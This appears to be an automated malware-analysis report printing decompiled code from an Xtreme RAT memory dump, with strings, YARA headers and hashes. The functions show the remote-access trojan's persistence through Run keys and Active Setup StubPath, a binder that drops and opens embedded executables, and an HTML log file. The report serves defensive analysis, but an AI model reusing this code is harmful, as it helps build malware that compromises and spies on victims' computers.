                  			E10008DA4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				char _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				char _v37;
                  				char _v38;
                  				char _v44;
                  				char _v48;
                  				char _v52;
                  				intOrPtr _t58;
                  				intOrPtr _t60;
                  				intOrPtr _t61;
                  				intOrPtr _t62;
                  				intOrPtr _t63;
                  				intOrPtr _t65;
                  				intOrPtr _t66;
                  				intOrPtr _t76;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				intOrPtr _t79;
                  				void* _t86;
                  				intOrPtr _t105;
                  				char* _t112;
                  				intOrPtr _t119;
                  				intOrPtr _t122;
                  				intOrPtr _t125;
                  				intOrPtr _t126;
                  				intOrPtr _t131;
                  				void* _t135;
                  				void* _t137;
                  				void* _t140;
                  
                  				_push(__ebx);
                  				_push(__esi);
                  				_push(__edi);
                  				_v52 = 0;
                  				_v44 = 0;
                  				_v48 = 0;
                  				_v12 = 0;
                  				_t137 = __ecx;
                  				_v8 = __edx;
                  				_t135 = __eax;
                  				_push(_t140);
                  				_push(0x1000907b);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t140 + 0xffffffd0;
                  				if( *0x1000e0b8 != 0xffffffff) {
                  					_v36 = 0;
                  					_v32 = 0;
                  					_push(0);
                  					_t58 =  *0x1000e0b8; // 0x0
                  					_push(_t58);
                  					L10004E80();
                  					_v20 = _t58;
                  					_v16 = 0;
                  					if(_v16 != 0) {
                  						if(__eflags > 0) {
                  							goto L5;
                  						}
                  					} else {
                  						if(_v20 > 0) {
                  							L5:
                  							_v36 = _v20;
                  							_v32 = _v16;
                  						}
                  					}
                  					if(_v32 != 0) {
                  						if(__eflags > 0) {
                  							goto L10;
                  						}
                  					} else {
                  						if(_v36 > 0) {
                  							L10:
                  							 *0x1000f6c4 = E10006788(0, _t135, _t137, __eflags);
                  							 *0x1000f6c8 = 0;
                  							_t60 =  *0x1000f6c4; // 0x0
                  							_t125 =  *0x1000f6c8; // 0x0
                  							__eflags = _t125 - _v32;
                  							if(__eflags != 0) {
                  								if(__eflags <= 0) {
                  									goto L15;
                  								} else {
                  									goto L14;
                  								}
                  							} else {
                  								__eflags = _t60 - _v36;
                  								if(_t60 <= _v36) {
                  									L15:
                  									_t61 =  *0x1000f6c4; // 0x0
                  									_t126 =  *0x1000f6c8; // 0x0
                  									__eflags = _t126 - _v32;
                  									if(_t126 != _v32) {
                  										goto L17;
                  									} else {
                  										__eflags = _t61 - _v36;
                  										if(_t61 != _v36) {
                  											goto L17;
                  										}
                  									}
                  								} else {
                  									L14:
                  									 *0x1000f6c4 = 0;
                  									 *0x1000f6c8 = 0;
                  									L17:
                  									__eflags =  *0x1000f688;
                  									if( *0x1000f688 != 0) {
                  										_push(0);
                  										_push(0);
                  										_t62 =  *0x1000f694; // 0xc1bc
                  										_push(_t62);
                  										_t63 =  *0x1000f688; // 0x0
                  										_push(E1000662C(_t63));
                  										L10005088();
                  										_push(0);
                  										_push(0);
                  										_t65 =  *0x1000f6c4; // 0x0
                  										_push(_t65);
                  										_t66 =  *0x1000e0b8; // 0x0
                  										_push(_t66);
                  										L10004F38();
                  										asm("sbb edx, [0x1000f6c8]");
                  										E10003BE4( &_v12, E10003FD4(_v36 -  *0x1000f6c4, _v32, 2, 0));
                  										_push(0);
                  										_push( &_v24);
                  										_push(_v36 -  *0x1000f6c4);
                  										_push(_v12);
                  										_t76 =  *0x1000e0b8; // 0x0
                  										_push(_t76);
                  										L10004F00();
                  										_push(2);
                  										_push(0);
                  										_push(0);
                  										_t77 =  *0x1000e0b8; // 0x0
                  										_push(_t77);
                  										L10004F38();
                  										_push(0);
                  										_push(0);
                  										_t78 =  *0x1000f698; // 0x0
                  										_push(_t78);
                  										_t79 =  *0x1000f688; // 0x0
                  										_push(E1000662C(_t79));
                  										L10005088();
                  										_push(L"<html>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;charset=UTF-8\">\r\n<head>\r\n<title>Xtreme RAT</title>\r\n</head>\r\n<body>");
                  										_push(_v12);
                  										_push(L"</body>");
                  										_push(0x100091ac);
                  										_push(L"</html>");
                  										E100039EC();
                  										_push(0x80);
                  										_push(_t137);
                  										L10004F30();
                  										_push(_t137);
                  										L10004E30();
                  										_push(0);
                  										_push(0);
                  										_push(2);
                  										_push(0);
                  										_push(0);
                  										_push(0x40000000);
                  										_push(_t137);
                  										L10004DE0();
                  										_t112 =  &_v12;
                  										__eflags = _t112 - 0xffffffff;
                  										if(_t112 != 0xffffffff) {
                  											_v38 = 0xff;
                  											_v37 = 0xfe;
                  											_push(0);
                  											_push( &_v24);
                  											_push(2);
                  											_push( &_v38);
                  											_push(_t112);
                  											L10004FA0();
                  											_push(0);
                  											_push( &_v24);
                  											_t105 = E1000391C(_v12) + _t104;
                  											__eflags = _t105;
                  											_push(_t105);
                  											_push(_v12);
                  											_push(_t112);
                  											L10004FA0();
                  										}
                  										_push(_t112);
                  										L10004DC0();
                  										_t117 = _t137;
                  										_t130 = _v8;
                  										_t86 = E100068EC(_t135, _t137, _v8, _a4, _a8, _a12);
                  										_t113 = _t86;
                  										__eflags = _t86 - 1;
                  										if(__eflags == 0) {
                  											 *0x1000f6c4 = _v36;
                  											 *0x1000f6c8 = _v32;
                  											E10006710( &_v44, _t117, _t130,  *0x1000f6c4,  *0x1000f6c8);
                  											_t119 =  *0x1000f6b4; // 0x0
                  											E10003988( &_v48, _t119, L"SOFTWARE\\", __eflags);
                  											E1000577C(0x80000001, _t113, L"LastSize", _v48, _t137, __eflags, 2, _v44);
                  										}
                  										_t131 =  *0x1000f684; // 0x0
                  										E10003988( &_v52, 0x100091fc, _t131, __eflags);
                  										_push(E1000390C(_v52));
                  										L10004E30();
                  									}
                  								}
                  							}
                  						} else {
                  						}
                  					}
                  				}
                  				_pop(_t122);
                  				 *[fs:eax] = _t122;
                  				_push(E10009082);
                  				E10003788( &_v52, 3);
                  				return E10003770( &_v12);
                  			}

                  Strings
                  • LastSize, xrefs: 10009028
                  • </html>, xrefs: 10008F4D
                  • SOFTWARE\, xrefs: 1000901B
                  • FTP, xrefs: 1000903A
                  • <html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>, xrefs: 10008F3B
                  • </body>, xrefs: 10008F43
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: </body>$</html>$<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>$FTP$LastSize$SOFTWARE\
                  • API String ID: 0-265700797
                  • Opcode ID: 70478f3f3047d89982752d3640f3cec2226bc33a26c5257581dd13bee4673461
                  • Instruction ID: 9ae569672a167bc613e47318ba2929e521b2e386b238916fb1c1f90ba9e27590
                  • Opcode Fuzzy Hash: 70478f3f3047d89982752d3640f3cec2226bc33a26c5257581dd13bee4673461
                  • Instruction Fuzzy Hash: 2C814D74A00259AFFB10DFA8CC85FEE77F9FB08380F508119F544A72A9CB75A9458B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E100096F6() {
                  				intOrPtr _t5;
                  				intOrPtr _t8;
                  
                  				_push(_t8);
                  				_push(0x1000977a);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t8;
                  				 *0x1000f6cc =  *0x1000f6cc - 1;
                  				if( *0x1000f6cc < 0) {
                  					_push(L"jiejwogfdjieovevodnvfnievn");
                  					L10005080();
                  					 *0x1000f68c = 0;
                  					_push(L"gsegtsrgrefsfsfsgrsgrt");
                  					L10005080();
                  					 *0x1000f690 = 0;
                  					_push(L"trhgtehgfsgrfgtrwegtre");
                  					L10005080();
                  					 *0x1000f694 = 0;
                  					_push(L"jytjyegrsfvfbgfsdf");
                  					L10005080();
                  					 *0x1000f694 = 0;
                  					_push(L"hgtrfsgfrsgfgregtregtr");
                  					L10005080();
                  					 *0x1000f69c = 0;
                  					_push(L"frgjbfdkbnfsdjbvofsjfrfre");
                  					L10005080();
                  					 *0x1000f6a0 = 0;
                  				}
                  				_pop(_t5);
                  				 *[fs:eax] = _t5;
                  				_push(E10009781);
                  				return 0;
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
                  • API String ID: 0-2672052065
                  • Opcode ID: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
                  • Instruction ID: ed3f77de684bd0d246fe2b552f76a464aac7a3f76a0323551fd1ca8e49655e55
                  • Opcode Fuzzy Hash: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
                  • Instruction Fuzzy Hash: 8BF0F9794192116EF701DF714C6697B7698E7453C13818529F5C882A3DDF3358059BE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E100096F8() {
                  				intOrPtr _t5;
                  				intOrPtr _t8;
                  
                  				_push(_t8);
                  				_push(0x1000977a);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t8;
                  				 *0x1000f6cc =  *0x1000f6cc - 1;
                  				if( *0x1000f6cc < 0) {
                  					_push(L"jiejwogfdjieovevodnvfnievn");
                  					L10005080();
                  					 *0x1000f68c = 0;
                  					_push(L"gsegtsrgrefsfsfsgrsgrt");
                  					L10005080();
                  					 *0x1000f690 = 0;
                  					_push(L"trhgtehgfsgrfgtrwegtre");
                  					L10005080();
                  					 *0x1000f694 = 0;
                  					_push(L"jytjyegrsfvfbgfsdf");
                  					L10005080();
                  					 *0x1000f694 = 0;
                  					_push(L"hgtrfsgfrsgfgregtregtr");
                  					L10005080();
                  					 *0x1000f69c = 0;
                  					_push(L"frgjbfdkbnfsdjbvofsjfrfre");
                  					L10005080();
                  					 *0x1000f6a0 = 0;
                  				}
                  				_pop(_t5);
                  				 *[fs:eax] = _t5;
                  				_push(E10009781);
                  				return 0;
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
                  • API String ID: 0-2672052065
                  • Opcode ID: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
                  • Instruction ID: 4cd3ad10a4a29e5a40757261822789eba1ab52c8d76854998792a07700413263
                  • Opcode Fuzzy Hash: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
                  • Instruction Fuzzy Hash: EDF0F4B94192116EF701DFB18C6A97B7A98E7453C13818529E6C882A3DDF331405ABE2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 35%
                  			E1000B78C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v1018;
                  				void _v5028;
                  				char _v5580;
                  				char _v5584;
                  				char _v5588;
                  				char _v5592;
                  				char _v5596;
                  				char _v5600;
                  				char _v5604;
                  				char _v5608;
                  				char _v5612;
                  				char _v5616;
                  				char _v5620;
                  				char _v5624;
                  				char _v5628;
                  				char _v5632;
                  				char _v5636;
                  				char _v5640;
                  				char _v5644;
                  				char _v5648;
                  				char _v5652;
                  				char _v5656;
                  				char _v5660;
                  				char _v5664;
                  				char _v5668;
                  				char _v5672;
                  				char _v5676;
                  				char _v5680;
                  				char _t138;
                  				void* _t149;
                  				char _t157;
                  				char* _t230;
                  				void* _t231;
                  				void* _t245;
                  				void* _t247;
                  				void* _t249;
                  				void* _t251;
                  				void* _t255;
                  				void* _t259;
                  				intOrPtr _t264;
                  				intOrPtr _t281;
                  				void* _t282;
                  				void* _t311;
                  				void* _t313;
                  				void* _t315;
                  				void* _t316;
                  
                  				_t315 = _t316;
                  				_t231 = 0x2c5;
                  				goto L1;
                  				L4:
                  				E10003A34(_v8, 0);
                  				if(0 == 0) {
                  					L29:
                  					_pop(_t264);
                  					 *[fs:eax] = _t264;
                  					_push(E1000BC64);
                  					E10003788( &_v5680, 0xf);
                  					E100032F0( &_v5620, 2);
                  					E10003788( &_v5612, 2);
                  					E100032F0( &_v5604, 2);
                  					E10003788( &_v5596, 4);
                  					return E10003788( &_v16, 3);
                  				} else {
                  					while(1) {
                  						E10003A34(_v8, 0);
                  						if(0 == 0) {
                  							goto L29;
                  						}
                  						E10003770( &_v16);
                  						E10003770( &_v12);
                  						E100050D8();
                  						E100050D0(_t230, E1000390C(_v8));
                  						E10003B04( &_v8, 0x228, 1, __eflags);
                  						E10003AB8(_v8, E10003FD4( *((intOrPtr*)(_t230 + 0x210)),  *((intOrPtr*)(_t230 + 0x214)), 2, 0), 1, __eflags,  &_v16);
                  						E10003B04( &_v8, E10003FD4( *((intOrPtr*)(_t230 + 0x210)),  *((intOrPtr*)(_t230 + 0x214)), 2, 0), 1, __eflags);
                  						__eflags =  *((char*)(_t230 + 0x220));
                  						if( *((char*)(_t230 + 0x220)) != 0) {
                  							L9:
                  							_t138 =  *((intOrPtr*)(_t230 + 0x218));
                  							__eflags = _t138;
                  							if(_t138 != 0) {
                  								__eflags = _t138 - 1;
                  								if(_t138 != 1) {
                  									__eflags = _t138 - 2;
                  									if(_t138 != 2) {
                  										__eflags = _t138 - 3;
                  										if(_t138 != 3) {
                  											__eflags = _t138 - 4;
                  											if(__eflags == 0) {
                  												E10005638( &_v5656, _t311, _t313);
                  												__eflags = 0;
                  												E10003A34(_v5656, 0);
                  												if(__eflags != 0) {
                  													E10005638( &_v5660, _t311, _t313);
                  													_push(_v5660);
                  													_push(E1000BCA4);
                  													E100038E0( &_v5664, 0x105, _t230);
                  													_push(_v5664);
                  													E100039EC();
                  												}
                  											}
                  										} else {
                  											E100038E0( &_v5648, 0x105, _t230);
                  											_push(_v5648);
                  											E10005324( &_v5652);
                  											_pop(_t245);
                  											E10003988( &_v12, _t245, _v5652, __eflags);
                  										}
                  									} else {
                  										E100038E0( &_v5640, 0x105, _t230);
                  										_push(_v5640);
                  										E10005460( &_v5644, _t230, 0x105, __eflags);
                  										_pop(_t247);
                  										E10003988( &_v12, _t247, _v5644, __eflags);
                  									}
                  								} else {
                  									E100038E0( &_v5632, 0x105, _t230);
                  									_push(_v5632);
                  									E100053D8( &_v5636, _t230, __eflags);
                  									_pop(_t249);
                  									E10003988( &_v12, _t249, _v5636, __eflags);
                  								}
                  							} else {
                  								E100038E0( &_v5624, 0x105, _t230);
                  								_push(_v5624);
                  								E10005350( &_v5628, _t230, __eflags);
                  								_pop(_t251);
                  								E10003988( &_v12, _t251, _v5628, __eflags);
                  							}
                  							E10003988( &_v5668, L".exe", _v12, __eflags);
                  							__eflags = E10005EB4(E1000390C(_v5668), L"OK", 4, 0);
                  							if(__eflags != 0) {
                  								_t281 = _v12;
                  								E10003988( &_v5680, L".xtr", _t281, __eflags);
                  								_push(E1000390C(_v5680));
                  								L10004E30();
                  							} else {
                  								E10005324( &_v5672);
                  								_push(_v5672);
                  								_push(E1000BCA4);
                  								E100038E0( &_v5676, 0x105, _t230);
                  								_push(_v5676);
                  								_t281 = 3;
                  								E100039EC();
                  							}
                  							_t149 = E1000391C(_v16);
                  							asm("cdq");
                  							_push(_t281);
                  							_push(_t149 + _t149);
                  							_push(E1000390C(_v16));
                  							_t313 = E1000390C(_v12);
                  							_pop(_t282);
                  							E10005EB4(_t313, _t282);
                  							_t157 =  *((intOrPtr*)(_t230 + 0x21c));
                  							__eflags = _t157 - 2;
                  							if(_t157 != 2) {
                  								__eflags = _t157 - 1;
                  								if(_t157 != 1) {
                  									__eflags = _t157;
                  									if(_t157 == 0) {
                  										_push(1);
                  										_push(0);
                  										_push(0);
                  										_push(_t313);
                  										_push(L"open");
                  										_push(0);
                  										L1000B6F8();
                  									}
                  								} else {
                  									_push(0);
                  									_push(0);
                  									_push(0);
                  									_push(_t313);
                  									_push(L"open");
                  									_push(0);
                  									L1000B6F8();
                  								}
                  							}
                  							continue;
                  						}
                  						_push(0);
                  						_push( &_v5588);
                  						E100038E0( &_v5592, 0x105, _t230);
                  						_push(_v5592);
                  						E100034B0( &_v5604, 0x3d,  &_v1018);
                  						E1000352C( &_v5600, _v5604, "SOFTWARE\\");
                  						E100038FC( &_v5596, _v5600);
                  						_pop(_t255);
                  						E1000553C(0x80000001, _t230, _t255, _v5596, _t313);
                  						E10003A34(_v5588, E1000BC98);
                  						if(__eflags == 0) {
                  							continue;
                  						} else {
                  							_push(E1000BC98);
                  							_push(2);
                  							E100038E0( &_v5608, 0x105, _t230);
                  							_push(_v5608);
                  							E100034B0( &_v5620, 0x3d,  &_v1018);
                  							E1000352C( &_v5616, _v5620, "SOFTWARE\\");
                  							E100038FC( &_v5612, _v5616);
                  							_pop(_t259);
                  							E1000577C(0x80000001, _t230, _t259, _v5612, _t313, __eflags);
                  							goto L9;
                  						}
                  					}
                  					goto L29;
                  				}
                  				L1:
                  				_push(0);
                  				_push(0);
                  				_t231 = _t231 - 1;
                  				if(_t231 != 0) {
                  					goto L1;
                  				} else {
                  					_push(_t231);
                  					_t313 = __eax;
                  					memcpy( &_v5028, __eax, 0x4e4 << 2);
                  					_t311 = _t313 + 0x9c8;
                  					_t230 =  &_v5580;
                  					_push(_t315);
                  					_push(0x1000bc5d);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t316 + 0xc;
                  					E1000B700( &_v8);
                  					E10003A34(_v8, 0);
                  					if(0 != 0) {
                  						E10006404(_v8, _t230,  &_v5584, L"BINDER", _t313, 0);
                  						E100037D0( &_v8, _v5584);
                  					}
                  					goto L4;
                  				}
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .exe$.xtr$BINDER$SOFTWARE\$open
                  • API String ID: 0-3085899294
                  • Opcode ID: a17296029010211923f33a32a025bfe9590920d378f998e5d8a670387b69a70f
                  • Instruction ID: e2e431fa4438d6138b358157023902ea7bce804184865157e4dc89de6df5abab
                  • Opcode Fuzzy Hash: a17296029010211923f33a32a025bfe9590920d378f998e5d8a670387b69a70f
                  • Instruction Fuzzy Hash: 33C11C38A005199BFB25DB54CC82BCFB3B9EB84381F5080B5B509AB249DE75FE858F51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E10009E6C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v117;
                  				void _v1264;
                  				char _v1386;
                  				char _v1508;
                  				char _v1509;
                  				char _v1510;
                  				char _v1511;
                  				char _v1512;
                  				char _v1634;
                  				char _v1756;
                  				char _v1878;
                  				char _v1880;
                  				void _v5028;
                  				char _v5032;
                  				char _v5036;
                  				char _v5040;
                  				char _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				char _v5060;
                  				void _v5184;
                  				char _v5188;
                  				char _v5192;
                  				intOrPtr* _t61;
                  				void* _t91;
                  				void* _t129;
                  				intOrPtr _t155;
                  				void* _t191;
                  				void* _t192;
                  				void* _t202;
                  
                  				_t127 = __ebx;
                  				_t61 = __eax +  *__eax;
                  				 *_t61 =  *_t61 + _t61;
                  				_pop(_t192);
                  				 *_t61 =  *_t61 + _t61;
                  				_v117 = _v117 + __edx;
                  				_t191 = _t192;
                  				_t129 = 0x288;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t129 = _t129 - 1;
                  				} while (_t129 != 0);
                  				_push(_t129);
                  				_push(__ebx);
                  				_t189 = __edx;
                  				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
                  				E10003C28( &_v8);
                  				_push(_t191);
                  				_push(0x1000a113);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t192 + 0xc;
                  				if(_v1880 != 0) {
                  					_t199 = _v1512 - 1;
                  					if(_v1512 == 1) {
                  						E100038E0( &_v5032, 0x3d,  &_v1878);
                  						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t199, 2, _v8);
                  					}
                  					_t200 = _v1511 - 1;
                  					if(_v1511 == 1) {
                  						E100038E0( &_v5036, 0x3d,  &_v1756);
                  						E1000577C(0x80000001, _t127, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t189, _t200, 2, _v8);
                  					}
                  					_t201 = _v1510 - 1;
                  					if(_v1510 == 1) {
                  						E100038E0( &_v5044, 0x3d,  &_v1634);
                  						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
                  						E100059E8(0x80000001, _t127, _v5040, _t201);
                  						E10003988( &_v5048, L" restart", _v8, _t201);
                  						E100038E0( &_v5056, 0x3d,  &_v1634);
                  						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t201);
                  						E1000577C(0x80000002, _t127, L"StubPath", _v5052, _t189, _t201, 2, _v5048);
                  					}
                  					_t202 = _v1509 - 1;
                  					if(_t202 == 0) {
                  						E100034B0( &_v5060, 0x3d,  &_v1264);
                  						E1000362C(_v5060, "%SERVER%");
                  						if(_t202 == 0) {
                  							E10005240(_v8, _t127, 0x3d,  &_v5184);
                  							_t189 =  &_v5184;
                  							memcpy( &_v1264,  &_v5184, 0x1e << 2);
                  							asm("movsw");
                  						}
                  						E100038E0( &_v16, 0x3d,  &_v1508);
                  						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
                  						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
                  						_t91 = E10005A94(_v12, _t127, _t87);
                  						E100038E0( &_v5188, 0x3d,  &_v1264);
                  						E100038E0( &_v5192, 0x3d,  &_v1386);
                  						E1000577C(_t91, _t91, _v5192, _v16, _t189, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
                  					}
                  				}
                  				_pop(_t155);
                  				 *[fs:eax] = _t155;
                  				_push(E1000A11A);
                  				E10003788( &_v5192, 2);
                  				E100032CC( &_v5060);
                  				E10003788( &_v5056, 7);
                  				return E10003788( &_v16, 3);
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
                  • API String ID: 0-2142522223
                  • Opcode ID: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
                  • Instruction ID: ccd5ba8bb55e14e3b401f0629b5d5422583a699d941ac8acb34279bb9c56e552
                  • Opcode Fuzzy Hash: 364ad897bbca38481dd1a11b2b492bd1a693bcb91c63773ed721ecd4ba2295bf
                  • Instruction Fuzzy Hash: A4619438A0415D9FEB25C750C881BDEB3BEEF45380F8081D6A908A768ADB756F85CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E10009E70(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v117;
                  				void _v1264;
                  				char _v1386;
                  				char _v1508;
                  				char _v1509;
                  				char _v1510;
                  				char _v1511;
                  				char _v1512;
                  				char _v1634;
                  				char _v1756;
                  				char _v1878;
                  				char _v1880;
                  				void _v5028;
                  				char _v5032;
                  				char _v5036;
                  				char _v5040;
                  				char _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				char _v5060;
                  				void _v5184;
                  				char _v5188;
                  				char _v5192;
                  				void* _t90;
                  				void* _t128;
                  				intOrPtr _t154;
                  				void* _t190;
                  				void* _t191;
                  				void* _t200;
                  
                  				_t126 = __ebx;
                  				_pop(_t191);
                  				 *__eax =  *__eax + __eax;
                  				_v117 = _v117 + __edx;
                  				_t190 = _t191;
                  				_t128 = 0x288;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t128 = _t128 - 1;
                  				} while (_t128 != 0);
                  				_push(_t128);
                  				_push(__ebx);
                  				_t188 = __edx;
                  				_v8 = memcpy( &_v5028, __edx, 0x4e4 << 2);
                  				E10003C28( &_v8);
                  				_push(_t190);
                  				_push(0x1000a113);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t191 + 0xc;
                  				if(_v1880 != 0) {
                  					_t197 = _v1512 - 1;
                  					if(_v1512 == 1) {
                  						E100038E0( &_v5032, 0x3d,  &_v1878);
                  						E1000577C(0x80000002, __ebx, _v5032, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t197, 2, _v8);
                  					}
                  					_t198 = _v1511 - 1;
                  					if(_v1511 == 1) {
                  						E100038E0( &_v5036, 0x3d,  &_v1756);
                  						E1000577C(0x80000001, _t126, _v5036, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t188, _t198, 2, _v8);
                  					}
                  					_t199 = _v1510 - 1;
                  					if(_v1510 == 1) {
                  						E100038E0( &_v5044, 0x3d,  &_v1634);
                  						E10003988( &_v5040, _v5044, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
                  						E100059E8(0x80000001, _t126, _v5040, _t199);
                  						E10003988( &_v5048, L" restart", _v8, _t199);
                  						E100038E0( &_v5056, 0x3d,  &_v1634);
                  						E10003988( &_v5052, _v5056, L"Software\\Microsoft\\Active Setup\\Installed Components\\", _t199);
                  						E1000577C(0x80000002, _t126, L"StubPath", _v5052, _t188, _t199, 2, _v5048);
                  					}
                  					_t200 = _v1509 - 1;
                  					if(_t200 == 0) {
                  						E100034B0( &_v5060, 0x3d,  &_v1264);
                  						E1000362C(_v5060, "%SERVER%");
                  						if(_t200 == 0) {
                  							E10005240(_v8, _t126, 0x3d,  &_v5184);
                  							_t188 =  &_v5184;
                  							memcpy( &_v1264,  &_v5184, 0x1e << 2);
                  							asm("movsw");
                  						}
                  						E100038E0( &_v16, 0x3d,  &_v1508);
                  						E10003AB8(_v16, E10003B94(0x1000a23c, _v16) - 1, 1, E10003B94(0x1000a23c, _v16) - 1,  &_v12);
                  						E10003B04( &_v16, E10003B94(0x1000a23c, _v16), 1, E10003B94(0x1000a23c, _v16) - 1);
                  						_t90 = E10005A94(_v12, _t126, _t86);
                  						E100038E0( &_v5188, 0x3d,  &_v1264);
                  						E100038E0( &_v5192, 0x3d,  &_v1386);
                  						E1000577C(_t90, _t90, _v5192, _v16, _t188, E10003B94(0x1000a23c, _v16) - 1, 2, _v5188);
                  					}
                  				}
                  				_pop(_t154);
                  				 *[fs:eax] = _t154;
                  				_push(E1000A11A);
                  				E10003788( &_v5192, 2);
                  				E100032CC( &_v5060);
                  				E10003788( &_v5056, 7);
                  				return E10003788( &_v16, 3);
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.304130740.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: restart$%SERVER%$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath
                  • API String ID: 0-2142522223
                  • Opcode ID: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
                  • Instruction ID: 7bb9cab796adacb123c590501e10766ab110edc906df9b0df81ab3aad42e102a
                  • Opcode Fuzzy Hash: 70bc63b1d7bf7f2434c0fd2a984a390c0a29f6a211df66fcb658c6ec4d215a6a
                  • Instruction Fuzzy Hash: 23619438A0415D9BEB25C750C881BDEB3BEEF45380F8081D6A908A764ADB756F85CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E10009E74(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				void _v1264;
                  				char _v1386;
                  				char _v1508;
                  				char _v1509;
                  				char _v1510;
                  				char _v1511;
                  				char _v1512;
                  				char _v1634;
                  				char _v1756;
                  				char _v1878;
                  				char _v1880;
                  				void _v5028;
                  				char _v5032;
                  				char _v5036;
                  				char _v5040;
                  				char _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				char _v5060;
                  				void _v5184;
                  				char _v5188;
                  				char _v5192;
                  				void* _t87;
                  				void* _t125;
                  				intOrPtr _t151;
                  				void* _t187;
                  				void* _t188;
                  				void* _t196;
                  
                  				_t123 = __ebx;
                  				_t187 = _t188;
                  				_t125 = 0x288;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t125 = _t125 - 1;
                  				} while (_t125 != 0);
                  				_push(_t125);
                  				_push(__ebx);
                  				_t185 = __edx;
